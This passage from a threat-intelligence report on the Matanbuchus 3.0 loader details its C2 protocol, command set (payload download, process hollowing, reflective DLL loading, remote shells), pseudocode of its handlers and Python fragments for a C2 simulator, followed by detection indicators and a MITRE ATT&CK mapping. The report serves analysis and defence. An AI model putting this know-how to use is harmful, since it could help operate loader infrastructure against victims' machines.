The server must respond with a valid OuterWrapper protobuf where the status field is set to a non-zero value (specifically 1 for success). Internally, the malware’s mw_register_beacon function extracts this status value and returns it to the caller, which validates it with a test eax, eax; jnz instruction sequence. If the status is zero or the response fails to parse, the malware considers registration unsuccessful and will retry on the next polling cycle. This handshake mechanism ensures that the bot only proceeds to the task-polling phase after receiving explicit acknowledgment from the C2 infrastructure.

// Registration flow (simplified from mw_register_beacon)

OuterWrapper wrapper = {
    .data = serialize_beacon(bot_id, os_ver, ...),
    .request_type = 1,  // Register
};
encrypted = chacha20_encrypt(serialize(wrapper));
response = http_post("/api/v1", length_prefix + encrypted);
decrypted = chacha20_decrypt(response);  // No length prefix!
parsed = parse_outer_wrapper(decrypted);
if (parsed.status == 0) goto retry;

4.6 Task Polling

Following successful registration, the malware enters a persistent polling loop with a default interval of 300 seconds (5 minutes). Each poll iteration constructs an OuterWrapper message with request_type=2 and sends it to the /api/v2 endpoint. The server’s response is where the protocol exhibits a critical asymmetry that tripped up our initial C2 server implementation: the response is parsed directly as a TaskResponse protobuf and is not wrapped in an OuterWrapper. This was confirmed by tracing the code path in mw_get_tasks_from_c2 (0x10048700), which passes the decrypted response directly to mw_parse_task_response (0x1007A730) using the TaskResponse descriptor at 0x100DDB30, bypassing the OuterWrapper parsing logic entirely. If the server has no pending tasks, it should return an empty TaskResponse; the malware will sleep for the configured interval and poll again.

TaskResponse fields:

Field #	Name	Type	Description
1	tasks	repeated TaskEntry	Array of task entries to execute
2	sleep_interval	varint	Optional: override polling interval (ms)
3	kill_flag	varint	If non-zero, malware terminates

TaskEntry fields:

Field #	Name	Type	Description
1	task_id	string	Unique task identifier (ASCII)
2	command_id	varint	Command type (1–13)
3	args	repeated string	Command arguments (URLs, paths, etc.)
4	execution_mode	varint	Sub-mode for commands with variants
5	timeout	varint	Task execution timeout (ms)

4.7 Result Reporting

After executing each assigned task, the malware constructs a result report and transmits it back to the C2 server via the /api/v2 endpoint with request_type=3. The report is wrapped in an OuterWrapper envelope (unlike task responses, result reports do use the wrapper). The ResultReport protobuf contains three fields: the bot identifier, the task ID being reported on, and the result data containing command output or a status message. A subtle but important encoding detail is that the task_id field uses ASCII encoding, while both bot_id and result_data use UTF-16LE. This encoding mismatch was a source of parsing errors during our C2 server development and must be handled explicitly in any implementation.

Field #	Name	Type	Description
1	bot_id	string (UTF-16LE)	Bot identifier (same as registration)
2	task_id	string (ASCII)	Task ID being reported (note: ASCII, not UTF-16LE)
3	result_data	string (UTF-16LE)	Command output or status message

⚠️ Note: The task_id field in ResultReport uses ASCII encoding, unlike bot_id and result_data which use UTF-16LE. This encoding mismatch must be handled correctly in any C2 server implementation.
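
The mixed encodings are easiest to handle by decoding each field explicitly. The sketch below parses a ResultReport that has already been decrypted and unwrapped from its OuterWrapper; the function names are hypothetical, and the sketch assumes all three fields arrive as length-delimited values.

```python
def _read_varint(buf: bytes, pos: int):
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


# Field number -> (name, text encoding), per the ResultReport table.
RESULT_FIELDS = {
    1: ("bot_id", "utf-16-le"),
    2: ("task_id", "ascii"),        # the odd one out
    3: ("result_data", "utf-16-le"),
}


def parse_result_report(buf: bytes) -> dict:
    report = {name: "" for name, _ in RESULT_FIELDS.values()}
    pos = 0
    while pos < len(buf):
        tag, pos = _read_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire != 2:
            raise ValueError(f"field {field}: expected length-delimited data")
        length, pos = _read_varint(buf, pos)
        raw, pos = buf[pos:pos + length], pos + length
        if field in RESULT_FIELDS:
            name, encoding = RESULT_FIELDS[field]
            report[name] = raw.decode(encoding, errors="replace")
    return report
```

Decoding task_id as UTF-16LE would pair up its ASCII bytes into unrelated code units, which is consistent with the parsing errors described above.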

5. Command Dispatch

The command dispatcher (mw_command_dispatcher_loop at 0x10075020) implements a task-processing architecture that routes incoming commands through a system of 6 categorized linked lists, each corresponding to a logical command group: payload delivery, DLL loading, system installation, reconnaissance, remote execution, and control operations. When the task-polling function receives a TaskResponse containing one or more TaskEntry items, each entry is classified by its command ID and appended to the appropriate linked list. The dispatcher loop then processes each list in sequence, dequeuing entries and routing them to their respective handler functions. A separate kill flag can be set by the C2 server to instruct the malware to terminate all operations, clean up artifacts, and exit—providing the operator with an emergency shutdown mechanism.

5.1 Command Reference

The malware supports a total of 13 distinct commands assigned sequential IDs from 1 through 13. These commands span four operational categories: payload delivery (commands 1–4, covering EXE execution, DLL loading, MSI installation, and shellcode injection), reconnaissance (commands 5–8, enumerating processes, services, installed applications, and Windows updates), remote execution (commands 9–11, providing cmd.exe, PowerShell, and WMI execution capabilities), and control (commands 12–13, for self-destruction and configuration updates). The following table provides a comprehensive reference for all supported commands.

ID	Command	Category	Handler Address	Description
1	Download & Execute EXE	Payload Delivery	0x100AA920	Downloads and executes a PE executable; 3 execution modes
2	Load DLL	Payload Delivery	0x100A7E00	Downloads and loads a DLL; 4 loading modes
3	Install MSI	Payload Delivery	0x100AC580	Downloads and installs an MSI package
4	Execute Shellcode	Payload Delivery	0x100B5420	Downloads and injects shellcode into memory
5	Enumerate Processes	Reconnaissance	0x100B1E10	Lists running processes (name, PID, path)
6	Enumerate Services	Reconnaissance	0x100B3E10	Lists Windows services and their status
7	Enumerate Installed Apps	Reconnaissance	0x100B6600	Lists installed applications from registry
8	Enumerate Windows Updates	Reconnaissance	0x100ACF10	Lists installed Windows updates/patches
9	Execute CMD	Remote Execution	0x100A6FE0	Executes a command via cmd.exe /c
10	Execute PowerShell	Remote Execution	0x100B0360	Executes a PowerShell command/script
11	Execute WMI	Remote Execution	0x100B94F0	Executes a WMI query or command
12	Self-Destruct	Control	0x100BE6F0	Cleans up and terminates the malware
13	Update Config	Control	—	Updates C2 configuration (URL, interval, etc.)

5.2 Download & Execute (Command 1)

Command 1 represents the primary payload delivery mechanism and is the most operationally significant command in the Matanbuchus repertoire. It supports three distinct execution modes that provide the operator with a spectrum of stealth-versus-simplicity trade-offs. The handler function downloads the specified payload from a URL provided in the task arguments, writes it to a temporary location (unless using the in-memory mode), and executes it according to the selected mode. Upon completion, the handler reports success or failure back to the C2 server via a ResultReport message.

Mode	Method	Description
0	CreateProcess	Standard process creation; payload written to disk first
1	ShellExecuteEx	Shell execution with verb handling; supports runas for elevation
2	Process Hollowing	Spawns suspended process, hollows it, injects payload in memory

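// Simplified dispatch logic from mw_handle_exe_cmd (error handling omitted)

void mw_handle_exe_cmd(TaskEntry* task) {
    BYTE* payload = download_file(task->args[0]);  // args[0]: payload URL
    switch (task->execution_mode) {
        case 0: create_process(payload); break;                 // mode 0: CreateProcess
        case 1: shell_execute(payload); break;                  // mode 1: ShellExecuteEx
        case 2: process_hollow(payload, task->args[1]); break;  // mode 2: process hollowing
    }
    // The real handler reports success or failure; only the success path is shown.
    report_result(task->task_id, "OK");
}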

5.3 DLL Loading (Command 2)

The DLL loading command (ID 2) provides four progressively sophisticated loading techniques, ranging from a standard LoadLibrary call to fully reflective injection. Each mode represents an escalation in evasion capability: higher-numbered modes avoid more detection surfaces (disk artifacts, API hooks, loaded-module lists) at the cost of increased implementation complexity and potential compatibility issues.

Mode	Method	Description
0	LoadLibrary	Standard DLL loading via LoadLibraryW
1	Manual Map (disk)	Manual PE mapping from disk; avoids LoadLibrary hooks
2	Manual Map (memory)	Downloads DLL, maps entirely in memory; no disk artifact
3	Reflective Load	Reflective DLL injection into remote process

5.4 Reconnaissance Commands (Commands 5–8)

Commands 5 through 8 provide the operator with comprehensive host reconnaissance capabilities, enabling detailed enumeration of the victim’s running processes, installed services, software inventory, and patch level. Each reconnaissance command collects its data through standard Windows APIs and formats the output as UTF-16LE strings, which are transmitted back to the C2 server in a ResultReport message. This information allows the operator to profile the target environment, identify security software, assess patch status for potential privilege escalation, and select appropriate secondary payloads tailored to the host’s configuration.

Command	Data Collected	Method
5 — Processes	Process name, PID, executable path	CreateToolhelp32Snapshot / Process32First/Next
6 — Services	Service name, display name, status, start type	EnumServicesStatusExW
7 — Installed Apps	Application name, version, publisher, install date	Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
8 — Windows Updates	Update KB number, description, install date	WMI: Win32_QuickFixEngineering
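On the receiving side, the UTF-16LE output has to be decoded before it can be reviewed. The sketch below shows one way to do that in Python. The decoding step follows from the encoding stated above, but the record and field separators (newline and tab) are assumptions made for illustration, since the exact layout of each report is not specified here; adjust them to whatever the captured data shows.

```python
def decode_result_text(raw: bytes) -> str:
    """Decode a UTF-16LE result buffer, dropping a stray odd byte and NUL padding."""
    if len(raw) % 2:
        raw = raw[:-1]  # UTF-16 code units are 2 bytes; ignore a trailing half unit
    return raw.decode("utf-16-le", errors="replace").rstrip("\x00")


def split_records(text: str, record_sep: str = "\n", field_sep: str = "\t") -> list[list[str]]:
    """Split decoded text into rows of fields.

    ASSUMPTION: both separators are hypothetical defaults, not confirmed
    properties of the Matanbuchus report format.
    """
    rows = []
    for line in text.split(record_sep):
        line = line.rstrip("\r")
        if line.strip():
            rows.append(line.split(field_sep))
    return rows
```

Keeping the separators as parameters means the same helper can be reused for all four reconnaissance commands once their real layouts are known.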

6. C2 Server Simulation

To rigorously validate our protocol reverse engineering and observe the malware’s complete behavioral repertoire in a controlled setting, we developed a fully functional C2 server simulator implemented in Python. The simulator faithfully replicates every layer of the Matanbuchus 3.0 C2 protocol stack—including the asymmetric framing, per-packet ChaCha20 encryption with 48-byte headers, nanopb protobuf serialization, and the correct endpoint routing for registration, task distribution, and result collection. The simulator was tested against the live malware sample executing in an isolated virtual machine, successfully completing full registration–tasking–result lifecycles and confirming the accuracy of every protocol detail documented in this report.
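The asymmetric framing is the detail most likely to trip up a reimplementation, so a short sketch may help. The functions below show how a server could strip the 4-byte prefix from bot packets while sending its own responses unframed. The function names are ours, and the byte order of the prefix (little-endian, counting only the bytes that follow it) is an assumption for illustration.

```python
import struct

PREFIX_LEN = 4  # client-to-server packets carry a 4-byte length prefix


def unframe_client_packet(data: bytes) -> bytes:
    """Strip and validate the length prefix on a bot-to-server packet.

    ASSUMPTION: the prefix is an unsigned little-endian 32-bit integer that
    counts the bytes following it.
    """
    if len(data) < PREFIX_LEN:
        raise ValueError("packet shorter than length prefix")
    (declared,) = struct.unpack_from("<I", data)
    body = data[PREFIX_LEN:]
    if declared != len(body):
        raise ValueError(f"length mismatch: declared {declared}, got {len(body)}")
    return body


def frame_client_packet(body: bytes) -> bytes:
    """Build a bot-style packet (useful for replaying captures in tests)."""
    return struct.pack("<I", len(body)) + body


def frame_server_response(body: bytes) -> bytes:
    """Server-to-client responses are sent as-is, with no length prefix."""
    return body
```

Making the server-side framing an explicit no-op function keeps the asymmetry visible in the code instead of leaving it as an easily forgotten omission.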

6.1 Architecture

Component	Purpose	Details
HTTPS Server (Flask)	Transport layer	Handles /api/v1 and /api/v2 endpoints; nginx TLS termination
ChaCha20 Engine	Packet encryption/decryption	Implements 48-byte header format; asymmetric framing
Protobuf Handler	Message serialization	Manual protobuf encoding/decoding (no .proto files needed)
Interactive Console	Operator interface	CLI for sending commands and viewing results
Session Manager	Bot tracking	Tracks registered bots and their task queues
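Manual protobuf handling, as listed for the Protobuf Handler, needs only a few primitives: varints, field keys, and length-delimited fields. The following is a minimal sketch of those primitives using the standard protobuf wire format. It covers wire types 0 and 2 only, and any field numbers used with it are hypothetical; the actual Matanbuchus message schemas are documented elsewhere in this report.

```python
def encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    if value < 0:
        raise ValueError("negative values are not handled in this sketch")
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # continuation bit: more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def decode_varint(buf: bytes, pos: int = 0) -> tuple[int, int]:
    """Decode a varint at pos; return (value, next position)."""
    result, shift = 0, 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def encode_field_varint(field_no: int, value: int) -> bytes:
    """Encode a wire-type-0 (varint) field."""
    return encode_varint(field_no << 3) + encode_varint(value)


def encode_field_bytes(field_no: int, data: bytes) -> bytes:
    """Encode a wire-type-2 (length-delimited) field: bytes, strings, sub-messages."""
    return encode_varint((field_no << 3) | 2) + encode_varint(len(data)) + data


def decode_message(buf: bytes) -> dict[int, list]:
    """Decode a flat message into {field number: [values]} (wire types 0 and 2 only)."""
    fields: dict[int, list] = {}
    pos = 0
    while pos < len(buf):
        key, pos = decode_varint(buf, pos)
        field_no, wire_type = key >> 3, key & 7
        if wire_type == 0:
            value, pos = decode_varint(buf, pos)
        elif wire_type == 2:
            length, pos = decode_varint(buf, pos)
            value = buf[pos:pos + length]
            if len(value) != length:
                raise ValueError("truncated length-delimited field")
            pos += length
        else:
            raise ValueError(f"unsupported wire type {wire_type}")
        fields.setdefault(field_no, []).append(value)
    return fields
```

Nested messages can be handled by calling decode_message again on the bytes of a length-delimited field.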

A significant implementation challenge was TLS termination. Initial attempts to serve HTTPS without a dedicated web server (first with Flask’s built-in SSL context, then with a socat-based TLS wrapper) consistently failed during the WinHTTP TLS handshake. Our investigation indicated that WinHTTP’s TLS stack has strict requirements around certificate chain validation and cipher suite negotiation that neither Python’s ssl module nor the lightweight TLS proxy satisfied in our setup. The solution was to deploy nginx as a reverse proxy that terminates TLS with a self-signed certificate and forwards plaintext HTTP to the Flask backend. This configuration was reliable across all testing sessions.

# Server startup
$ python3 matanbuchus_c2.py

[*] Matanbuchus C2 Server v3.0
[*] Listening on 0.0.0.0:8443
[*] Endpoints: /api/v1 (register), /api/v2 (tasks/results)
[*] Interactive console ready

matanbuchus> help

6.2 Interactive Console

The simulator provides an interactive command-line console that enables real-time operator interaction with registered bots. The console supports the full range of Matanbuchus commands, allowing the analyst to issue tasks, monitor bot status, and review execution results as they arrive. This interactive capability proved invaluable during testing, as it allowed us to exercise each command handler individually and verify its behavior against our static analysis findings.

Command	Arguments	Description
list	—	List all registered bots with system info
exec		Execute a shell command (cmd.exe)
powershell		Execute a PowerShell command
download	[mode]	Download & execute (mode: 0/1/2)
dll	[mode]	Load DLL (mode: 0/1/2/3)
processes		Enumerate running processes
services		Enumerate Windows services
apps		Enumerate installed applications
updates		Enumerate Windows updates
results	[bot_id]	View task execution results
kill		Send self-destruct command
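To illustrate how the console verbs relate to the command IDs from Section 5, the sketch below parses a console line into a task description. The verb-to-ID mapping and the allowed mode ranges come from the tables in this report; the parsing rules are assumptions (whitespace-separated arguments, with the optional mode given as a trailing integer), and the real simulator's argument layout may differ. Verbs such as list and results act on the simulator itself, so they have no command ID here.

```python
# Console verb -> (command ID, allowed modes or None when the command has no mode)
VERBS = {
    "exec": (9, None),
    "powershell": (10, None),
    "download": (1, (0, 1, 2)),
    "dll": (2, (0, 1, 2, 3)),
    "processes": (5, None),
    "services": (6, None),
    "apps": (7, None),
    "updates": (8, None),
    "kill": (12, None),
}


def parse_console_line(line: str) -> dict:
    """Turn a console line into {'command_id', 'mode', 'args'}.

    ASSUMPTION: arguments are whitespace-separated and an optional mode is
    the last token; mode stays None when the operator omits it.
    """
    tokens = line.split()
    if not tokens:
        raise ValueError("empty command")
    verb, args = tokens[0].lower(), tokens[1:]
    if verb not in VERBS:
        raise ValueError(f"unknown verb: {verb}")
    command_id, allowed_modes = VERBS[verb]
    mode = None
    if allowed_modes is not None and args and args[-1].isdigit():
        mode = int(args.pop())
        if mode not in allowed_modes:
            raise ValueError(f"mode {mode} not valid for {verb}")
    return {"command_id": command_id, "mode": mode, "args": args}
```

Rejecting out-of-range modes at the console keeps malformed tasks from reaching the bot, which makes handler behavior easier to attribute during testing.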

6.3 Live Test Results

The C2 simulator was validated against the live Matanbuchus sample executing within an isolated, network-segmented virtual machine environment. DNS resolution for the C2 domain was redirected to our analysis host via local DNS manipulation, and nginx handled TLS termination on port 443. The following sequence captures a complete end-to-end C2 interaction cycle—from initial bot registration through task assignment to result collection—demonstrating that every protocol layer functions correctly.

[Figure: C2 server simulation, bot registration]

Registration:

[+] New bot registered:
    Bot ID:    DESKTOP-ABC1234_user1_A7F3B2
    OS:        Windows 10.0
    Computer:  DESKTOP-ABC1234
    User:      user1
    Admin:     No
    64-bit:    Yes
    CPU:       Intel(R) Core(TM) i7-9750H
    RAM:       8192 MB
    AV:        Windows Defender

[Figure: C2 server simulation, registration details]

CMD whoami execution:

[Figure: C2 server simulation, CMD whoami execution]

Enumerate processes command:

[Figure: C2 server simulation, enumerate processes command]

Enumerated process list, saved as a JSON file:

[Figure: Enumerated process list saved as JSON]

7. Detection & Mitigation

The following indicators of compromise and behavioral signatures can be used to detect Matanbuchus 3.0 activity at the network and host levels. We also provide a mapping to the MITRE ATT&CK framework to facilitate integration with existing threat intelligence platforms and detection engineering workflows. Network-based detections should focus on the characteristic HTTPS POST pattern to the known endpoint paths, while host-based detections can leverage the unusual file size, the distinctive API resolution pattern, and the specific memory layout of the opaque predicate globals.

7.1 Network Indicators

Indicator	Type	Description
mechiraz[.]com	Domain	Primary C2 domain
/api/v1	URI Path	Registration endpoint
/api/v2	URI Path	Task polling and result reporting endpoint
application/octet-stream	Content-Type	All C2 POST requests use this content type
HTTPS POST (port 443)	Protocol	All C2 traffic uses encrypted HTTPS POST
300-second interval	Behavior	Regular polling beacon with 5-minute interval
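These indicators can be combined into a simple behavioral check. The sketch below flags a host whose traffic matches the request shape and polling cadence listed above. It assumes the analyst already has decrypted HTTP metadata (for example from a TLS-inspecting proxy), since the traffic is HTTPS. The HttpEvent type, the 15-second tolerance, and the minimum of four polls are illustrative choices, not measured properties of the malware.

```python
from dataclasses import dataclass
from statistics import median

C2_PATHS = {"/api/v1", "/api/v2"}


@dataclass
class HttpEvent:
    timestamp: float   # seconds since epoch
    method: str
    path: str
    content_type: str


def matches_c2_shape(ev: HttpEvent) -> bool:
    """POST to a known endpoint path with an octet-stream body."""
    return (
        ev.method.upper() == "POST"
        and ev.path in C2_PATHS
        and ev.content_type.lower().startswith("application/octet-stream")
    )


def looks_like_beacon(events, interval=300.0, tolerance=15.0, min_polls=4) -> bool:
    """True when /api/v2 polls from one host recur at roughly `interval` seconds.

    ASSUMPTION: tolerance and min_polls are hypothetical tuning values.
    """
    times = sorted(
        ev.timestamp for ev in events
        if matches_c2_shape(ev) and ev.path == "/api/v2"
    )
    if len(times) < min_polls:
        return False
    gaps = [later - earlier for earlier, later in zip(times, times[1:])]
    return abs(median(gaps) - interval) <= tolerance
```

Using the median gap rather than the mean keeps a single delayed or missed poll from hiding an otherwise regular beacon.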

7.2 Host Indicators

Indicator	Type	Description
77a53dc…07ba	SHA256	Sample file hash
PE32 DLL, ~59 MB	File Property	Abnormally large DLL (size inflation)
Start export	Export	Execution entry point
rundll32.exe Start	Process	Expected execution method
0x1011A160–0x1011A220	Memory	Opaque predicate globals (if scanning memory)
WinHTTP API usage	API	Uses WinHTTP (not WinINet) for C2 communication

7.3 MITRE ATT&CK Mapping

Technique ID	Name	Description
T1059.001	PowerShell	Command 10: Execute PowerShell scripts
T1059.003	Windows Command Shell	Command 9: Execute cmd.exe commands
T1047	Windows Management Instrumentation	Command 11: Execute WMI queries
T1055.012	Process Hollowing	Command 1 mode 2: Process hollowing for EXE execution
T1218.007	Msiexec	Command 3: MSI package installation
T1106	Native API	Dynamic API resolution via MurmurHash3
T1027	Obfuscated Files or Information	7 obfuscation techniques including ChaCha20 string encryption
T1027.001	Binary Padding	57.7 MB .data section inflation
T1140	Deobfuscate/Decode Files or Information	Runtime string decryption and API resolution
T1082	System Information Discovery	Registration beacon collects OS, CPU, RAM, AV info
T1057	Process Discovery	Command 5: Enumerate running processes
T1007	System Service Discovery	Command 6: Enumerate Windows services
T1518	Software Discovery	Command 7: Enumerate installed applications
T1071.001	Web Protocols	HTTPS POST for C2 communication
T1573.001	Symmetric Cryptography	ChaCha20 encryption for C2 traffic
T1132.001	Standard Encoding	Protocol Buffers (nanopb) for message serialization

8. Conclusion

Matanbuchus 3.0 represents a mature and actively maintained loader-as-a-service offering that demonstrates significant investment in anti-analysis capabilities. The seven-layer obfuscation scheme—anchored by a system of 34 mutable opaque predicate globals with cascading write-back mutation, aggressive dead store injection exceeding 90% code volume in critical functions, and environment-dependent predicate seeding via junk API calls—represents a substantial barrier to efficient reverse engineering. An unprepared analyst could easily spend hours navigating thousands of lines of decompiled pseudocode before realizing that the vast majority of it serves no operational purpose.

Beneath the obfuscation, however, the underlying C2 protocol is pragmatic and well-structured. The combination of ChaCha20 stream encryption (without authentication), nanopb protobuf serialization, and a clean REST-like endpoint scheme over HTTPS makes the protocol straightforward to reimplement once the obfuscation is stripped away. The absence of a Poly1305 MAC means that encrypted payloads can be tampered with in transit without detection, and the use of a single static ChaCha20 key and nonce for all string encryption creates a single point of failure for the entire string obfuscation layer—recovery of these 44 bytes unlocks every encrypted string in the binary.
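The practical meaning of unauthenticated ChaCha20 can be shown in a few lines. The sketch below is a plain RFC 8439 ChaCha20 implementation in pure Python, followed by a helper that rewrites known plaintext inside a ciphertext without knowing the key. It is a generic demonstration of stream-cipher malleability, not a reproduction of the Matanbuchus packet format; the initial block counter used by the malware is not covered here, so it is left as a parameter, and the key, nonce, and messages in any usage are made up.

```python
import struct


def _rotl32(v: int, n: int) -> int:
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))


def _quarter_round(s: list, a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """Produce one 64-byte keystream block (RFC 8439, 32-bit counter, 96-bit nonce)."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("key must be 32 bytes and nonce 12 bytes")
    state = [0x61707865, 0x3320646E, 0x79622D32, 0x6B206574]
    state += struct.unpack("<8I", key)
    state += [counter & 0xFFFFFFFF]
    state += struct.unpack("<3I", nonce)
    working = state[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        _quarter_round(working, 0, 4, 8, 12)
        _quarter_round(working, 1, 5, 9, 13)
        _quarter_round(working, 2, 6, 10, 14)
        _quarter_round(working, 3, 7, 11, 15)
        _quarter_round(working, 0, 5, 10, 15)
        _quarter_round(working, 1, 6, 11, 12)
        _quarter_round(working, 2, 7, 8, 13)
        _quarter_round(working, 3, 4, 9, 14)
    return struct.pack("<16I", *((w + s) & 0xFFFFFFFF for w, s in zip(working, state)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """Encrypt or decrypt (the same operation) by XORing with the keystream."""
    out = bytearray()
    for i in range(0, len(data), 64):
        keystream = chacha20_block(key, counter + i // 64, nonce)
        out.extend(b ^ k for b, k in zip(data[i:i + 64], keystream))
    return bytes(out)


def flip_plaintext(ciphertext: bytes, offset: int, old: bytes, new: bytes) -> bytes:
    """Rewrite known plaintext without the key: C' = C xor old xor new."""
    if len(old) != len(new):
        raise ValueError("old and new must have equal length")
    patched = bytearray(ciphertext)
    for i, (o, n) in enumerate(zip(old, new)):
        patched[offset + i] ^= o ^ n
    return bytes(patched)
```

Because no MAC covers the ciphertext, the receiver has no way to tell a patched packet from a genuine one; only the party doing the patching needs to know (or guess) the original plaintext at that offset.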

The successful development and live validation of our C2 server simulator demonstrates that the Matanbuchus 3.0 protocol can be replicated by defenders. This capability opens several avenues for threat intelligence teams: controlled detonation and behavioral analysis of samples without relying on active criminal infrastructure, extraction of secondary payloads for further analysis, and generation of high-fidelity network signatures based on observed traffic patterns. We hope this report and its accompanying tooling provide a useful resource for the security community in understanding and defending against this persistent threat.

Key takeaways:

Focus on function calls to trace real logic — approximately 90% of decompiled code is obfuscation noise. Identifying the ~10% of meaningful code is the critical first step.
The C2 framing is asymmetric — client sends a 4-byte length prefix, server does not. Missing this detail will break any C2 server implementation.
Task responses are NOT wrapped in OuterWrapper — they are parsed directly as TaskResponse protobuf. Registration and results use OuterWrapper, but task polling responses do not.
